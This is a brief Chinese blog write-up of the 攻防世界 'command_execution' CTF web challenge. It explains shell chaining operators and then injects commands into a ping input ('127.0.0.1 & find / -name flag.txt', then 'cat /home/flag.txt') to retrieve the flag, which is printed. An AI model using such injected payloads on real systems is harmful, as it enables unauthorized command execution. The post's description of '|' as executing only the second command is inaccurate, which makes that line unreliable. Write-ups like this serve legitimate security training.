攻防世界:web区command_execution

这道题是我没有见过的,因为对命令的了解比较少:

command1 & command2 :两个命令都执行
command1 && command2 :与执行,第一个成功执行第二个才会执行
command1 | command2 :或执行,只执行第二个
command1 || command2:第一个执行成功,第二个不执行。第一个执行失败,第二个执行

在这里插入图片描述
小明没有防火墙,就直接开搞就可以了:
输入:127.0.0.1 & find / -name flag.txt
在这里插入图片描述
你看Ping发了三个包,第二个显示了我们的目录,之后又在发包:
输入:127.0.0.1 & cat /home/flag.txt
在这里插入图片描述

cyberpeace{8b2bc82db64c4ca4be59324fcaf303e9}
posted @ 2021-08-16 10:49  Zeker62  阅读(122)  评论(0编辑  收藏  举报